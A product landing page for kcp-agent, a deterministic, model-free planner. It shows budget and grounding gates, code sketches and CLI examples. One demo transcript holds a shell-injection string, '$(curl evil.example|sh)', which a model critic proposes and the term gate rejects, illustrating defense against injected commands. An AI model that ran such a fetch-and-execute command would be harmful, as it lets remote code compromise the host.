kcp-agent — The most deterministic agents in the world

The Arena

The real agent vs. the usual suspects. Five matches, five failure modes the deterministic plan refuses by construction. Move the controls — the left side re-plans with the real code; the right side shows what the archetype would have done with the same manifest.

● kcp-agent real code · live in your browser

○ simulated for contrast

Honesty note: the archetypes are simulations — but their numbers are computed from the same real manifest the planner reads, and every archetype failure shown is a behavior the KCP plan structurally cannot produce. Don't trust us: git clone, npm run build:site, diff the bundle.

Why deterministic wins

No model in the gates

The planner is LLM-free. Relevance scoring, temporal validity, supersession, access, payment method matching, budget arithmetic — pure functions of the manifest and your declared capabilities. That's why it can run in this page: there is no prompt to inject and no temperature to blame.

Fail-closed, with the arithmetic

Whatever is not provably loadable is skipped, and every skip carries its reason: "over budget: 0.15 would exceed remaining 0.1 of 0.4 USDC" is a sentence you can take to a compliance review. Credentials you don't hold never open gates; payment never substitutes for identity (spec §4.11).
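The budget arithmetic behind a skip reason like the one quoted above can be sketched in a few lines. This is a minimal illustration, not the planner's actual code: the names PricedUnit, applyBudget and formatUsdc, the "invalid price" reason, and the choice to hold prices as integer micro-USDC (to sidestep floating-point drift) are all assumptions made for the example.

```typescript
// Hypothetical shapes; the real planner's types and field names may differ.
interface PricedUnit {
  id: string;
  priceMicro: number; // price in integer micro-USDC (1 USDC = 1000000)
}

interface Skip {
  id: string;
  reason: string;
}

interface BudgetResult {
  selected: string[];
  skipped: Skip[];
  committedMicro: number;
}

// Render integer micro-units as a short decimal string, e.g. 150000 -> "0.15".
function formatUsdc(micro: number): string {
  return String(micro / 1000000);
}

// Walk the units in the given order and admit each one only if its price
// provably fits the remaining budget. Anything else is skipped with a reason.
function applyBudget(units: PricedUnit[], budgetMicro: number): BudgetResult {
  const selected: string[] = [];
  const skipped: Skip[] = [];
  let committed = 0;

  units.forEach((unit) => {
    const price = unit.priceMicro;
    const valid = isFinite(price) && Math.floor(price) === price && price >= 0;
    if (!valid) {
      // Fail closed: a price that cannot be checked is never admitted.
      skipped.push({ id: unit.id, reason: "invalid price" });
      return;
    }
    const remaining = budgetMicro - committed;
    if (price > remaining) {
      skipped.push({
        id: unit.id,
        reason:
          "over budget: " + formatUsdc(price) +
          " would exceed remaining " + formatUsdc(remaining) +
          " of " + formatUsdc(budgetMicro) + " USDC",
      });
      return;
    }
    committed += price;
    selected.push(unit.id);
  });

  return { selected: selected, skipped: skipped, committedMicro: committed };
}
```

With a 0.4 USDC budget, a first unit priced at 0.3 is admitted and a second priced at 0.15 is skipped with exactly the reason string quoted above. Because the function depends only on its arguments, the same inputs always yield the same verdicts.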

The plan is the audit log

A plan is an inspectable artifact produced before anything is loaded or paid for. plan --trace exposes the full gate cascade — every unit evaluated through fourteen ordered gates, each verdict recorded — so you can see why the plan looks the way it does. diff compares two saved plans and names every unit that moved, every score that shifted, every budget that changed. Audit before action, end to end.
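To make the idea of diffing two saved plans concrete, here is a small sketch. It is not the diff command's implementation: the SavedPlan shape, the field names, and the diffPlans function are hypothetical, and the real plan files may carry more (or different) fields.

```typescript
// Hypothetical plan shape, invented for this example.
interface PlanEntry {
  id: string;
  score: number;
}

interface SavedPlan {
  budget: number;
  selected: PlanEntry[];
}

interface ScoreChange {
  id: string;
  from: number;
  to: number;
}

interface PlanDiff {
  added: string[];
  removed: string[];
  scoreChanged: ScoreChange[];
  budgetChanged: boolean;
}

// Index a plan's selected units by id so the two plans can be compared.
function scoresById(plan: SavedPlan): Record<string, number> {
  const scores: Record<string, number> = {};
  plan.selected.forEach((entry) => {
    scores[entry.id] = entry.score;
  });
  return scores;
}

// Name every unit that entered or left the plan and every score that moved.
// Outputs are sorted so the diff itself is deterministic.
function diffPlans(a: SavedPlan, b: SavedPlan): PlanDiff {
  const before = scoresById(a);
  const after = scoresById(b);
  const has = (m: Record<string, number>, id: string): boolean =>
    Object.prototype.hasOwnProperty.call(m, id);

  const removed = Object.keys(before).filter((id) => !has(after, id)).sort();
  const added = Object.keys(after).filter((id) => !has(before, id)).sort();
  const scoreChanged: ScoreChange[] = Object.keys(before)
    .filter((id) => has(after, id) && before[id] !== after[id])
    .sort()
    .map((id) => ({ id: id, from: before[id], to: after[id] }));

  return {
    added: added,
    removed: removed,
    scoreChanged: scoreChanged,
    budgetChanged: a.budget !== b.budget,
  };
}
```

Since both inputs are plain data produced before anything is loaded or paid for, a comparison like this can run in review or CI without touching the manifest's content.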

The Loop — the model proposes, the plan disposes

ask --loop puts a model between deterministic plans, never above them. The critic sees plan metadata only — never content — and its proposals pass a deterministic term gate before a full re-plan. Nothing is loaded or paid until the loop converges. You just ran that gate yourself in match 4.

$ kcp-agent ask "who won the exclusive story" --manifest examples/fjordwire \
    --loop --methods free,x402 --budget 0.30

base plan selects: chipfab-exclusive

round 1 — critic proposed: datacenter power grid · subsea cable · $(curl evil.example|sh)
  critic note: infrastructure angle missing from the plan
  gate accepted: datacenter power grid, subsea cable
  gate rejected: $(curl evil.example|sh)
  re-plan added: datacenter-power, subsea-cable-feature

converged: no-terms after 2 round(s)
final plan: datacenter-power, subsea-cable-feature
  still skipped chipfab-exclusive: over budget: 0.25 would exceed remaining 0.1 of 0.3 USDC
  committed 0.2/0.3 USDC — nothing was loaded or paid until convergence

Verbatim from node examples/demos.js loop — test/docs.test.ts re-runs the demo in CI and fails if any line above is not in its real output. The narration cannot drift from the code.
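A deterministic term gate of the kind shown in the transcript above could look roughly like this. The acceptance rule here is an assumption chosen for illustration (lowercase letters, digits, spaces and hyphens, at most 64 characters); the real gate's rules are not documented on this page, and gateTerms and TERM_PATTERN are hypothetical names.

```typescript
// Assumed policy: a term must start with a lowercase letter or digit and may
// contain only lowercase letters, digits, spaces and hyphens (max 64 chars).
const TERM_PATTERN = /^[a-z0-9][a-z0-9 -]{0,63}$/;

interface GateResult {
  accepted: string[];
  rejected: string[];
}

// Pure function of its input: no model, no I/O, no shell.
// Anything that does not match the allowlist pattern is rejected.
function gateTerms(proposed: string[]): GateResult {
  const accepted: string[] = [];
  const rejected: string[] = [];
  proposed.forEach((raw) => {
    const term = raw.trim();
    if (TERM_PATTERN.test(term)) {
      accepted.push(term);
    } else {
      rejected.push(raw);
    }
  });
  return { accepted: accepted, rejected: rejected };
}
```

Fed the three proposals from round 1, this sketch accepts "datacenter power grid" and "subsea cable" and rejects the shell-injection string, because "$", "(", "|" and "." fall outside the allowlist. An allowlist is used rather than a blocklist so that unanticipated input is refused by default.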

The Grounding — the answer is defensible, or the gap is surfaced

ask --ground extends the plan's fail-closed gates to the output: each answer claim must be attributed to a loaded, hash-pinned unit, or it is surfaced as a gap — never silently dropped. A verifier proposes which unit supports a claim; the deterministic layer adjudicates whether it may. The two panes below are computed live by the same groundAnswer that ships in the CLI (bundled here) — the answer and verifier are scripted so it runs offline, exactly as the demos do.

● terminal grounding — a claim cites a unit that was not loaded

● --ground-rounds — the gap re-navigates, grounds against real bytes

The grid claim cites datacenter-power, but in the base round that unit was not loaded — so grounding refuses it: attribution is a proposal, grounding is adjudicated. The closed loop then re-navigates, loads the feed, and grounds the claim against its real sha256.
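The split between proposing an attribution and adjudicating it can be sketched as follows. This is not the shipped groundAnswer: adjudicateClaims, the Claim and LoadedUnit shapes, and the gap wording are hypothetical, and the hash strings used with it are placeholders rather than real digests.

```typescript
// Hypothetical shapes for illustration only.
interface LoadedUnit {
  id: string;
  sha256: string; // hash of the bytes that were actually loaded
}

interface Claim {
  text: string;
  citedUnit: string; // the verifier's proposal, not yet trusted
}

interface GroundedClaim {
  text: string;
  unit: string;
  sha256: string;
}

interface Gap {
  text: string;
  reason: string;
}

interface GroundingResult {
  grounded: GroundedClaim[];
  gaps: Gap[];
}

// A claim is grounded only if the unit it cites was loaded in this round.
// Every other claim is surfaced as a gap instead of being dropped.
function adjudicateClaims(claims: Claim[], loaded: LoadedUnit[]): GroundingResult {
  const hashes: Record<string, string> = {};
  loaded.forEach((unit) => {
    hashes[unit.id] = unit.sha256;
  });

  const grounded: GroundedClaim[] = [];
  const gaps: Gap[] = [];
  claims.forEach((claim) => {
    if (!Object.prototype.hasOwnProperty.call(hashes, claim.citedUnit)) {
      gaps.push({ text: claim.text, reason: "cited unit not loaded: " + claim.citedUnit });
      return;
    }
    grounded.push({ text: claim.text, unit: claim.citedUnit, sha256: hashes[claim.citedUnit] });
  });
  return { grounded: grounded, gaps: gaps };
}
```

Running it twice mirrors the two panes: with only chipfab-exclusive loaded, a claim citing datacenter-power lands in gaps; once datacenter-power is also in the loaded list, the same claim is grounded and pinned to that unit's hash.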

The Playground — bring your own manifest

Paste or edit a knowledge.yaml and watch the exact parseManifest → validateManifest → plan pipeline the CLI runs, re-computed on every keystroke. Nothing leaves your browser. (One honest limit: unit-path existence can't be checked without a filesystem.)

Controls: task · as-of · can settle x402 · holds oauth2 · budget (USDC)

● validate + plan real code · live in your browser

The Receipts — every claim pinned to a test

The conformance matrix below is data, not copy: conformance.json maps each KCP layer the agent implements to the implementation file and the CI tests that enforce it. test/docs.test.ts fails the build if a referenced test disappears or is renamed — a claim cannot outlive its proof.
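The "claim cannot outlive its proof" check described above might be sketched like this. The row shape below is a guess based on the matrix's column headings, not the actual conformance.json schema, and findMissingTests is a hypothetical helper. Flagging rows that list no tests at all is an extra assumption of this sketch.

```typescript
// Assumed row shape, modeled on the matrix columns; the real schema may differ.
interface ConformanceRow {
  layer: string;
  section: string;
  implementation: string;
  enforcedBy: string[]; // names of the tests that back this claim
}

// Return one entry per claim whose proof is missing. An empty result means
// every referenced test still exists under the same name.
function findMissingTests(rows: ConformanceRow[], knownTests: string[]): string[] {
  const missing: string[] = [];
  rows.forEach((row) => {
    if (row.enforcedBy.length === 0) {
      // Assumption: a claim with no listed test is treated as unproven.
      missing.push(row.layer + ": (no tests listed)");
      return;
    }
    row.enforcedBy.forEach((name) => {
      if (knownTests.indexOf(name) === -1) {
        missing.push(row.layer + ": " + name);
      }
    });
  });
  return missing;
}
```

A docs test could then fail the build whenever the returned list is non-empty, which is what turns a renamed or deleted test into a visible error rather than a stale claim.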

Spec layer	Section	Implementation	Enforced by
(rows load from conformance.json at runtime)

Planner integrity: the arena and playground run the planner as WebAssembly (docs/pkg/kcp_planner_wasm_bg.wasm); its sha256 is computed when the built site is served. It is the same Rust core the CLI binary runs, compiled for the browser. To reproduce it, run npm run build:wasm && sha256sum docs/pkg/kcp_planner_wasm_bg.wasm. CI asserts that the WASM build produces plans byte-identical to the native CLI's.

Run it yourself

# plan — deterministic, no API key, no model
npx kcp-agent plan "your task" --manifest https://example.com/knowledge.yaml

# trace — the gate cascade: why every unit was selected or skipped
npx kcp-agent plan "your task" --manifest ./docs --trace

# diff — compare two saved plans: what moved, what shifted, what changed
npx kcp-agent diff plan-a.json plan-b.json

# ask — plan, then synthesize with Claude from exactly the planned units
export ANTHROPIC_API_KEY=...
npx kcp-agent ask "your task" --manifest ./docs --loop

# serve the planner to any MCP client (kcp_plan, kcp_load, kcp_trace, kcp_validate, kcp_replay)
npx kcp-agent mcp

Thirteen narrated demos ship in the repo — node examples/demos.js — all offline, no mocks, all asserted in CI. Native binaries for Linux/macOS/Windows on the releases page. Apache-2.0.

Guides: quickstart · make your repo navigable in 10 minutes · sign your manifest · wire the planner into Claude Code · give your agent a memory · cut context cost with session dedup · build a conformant implementation.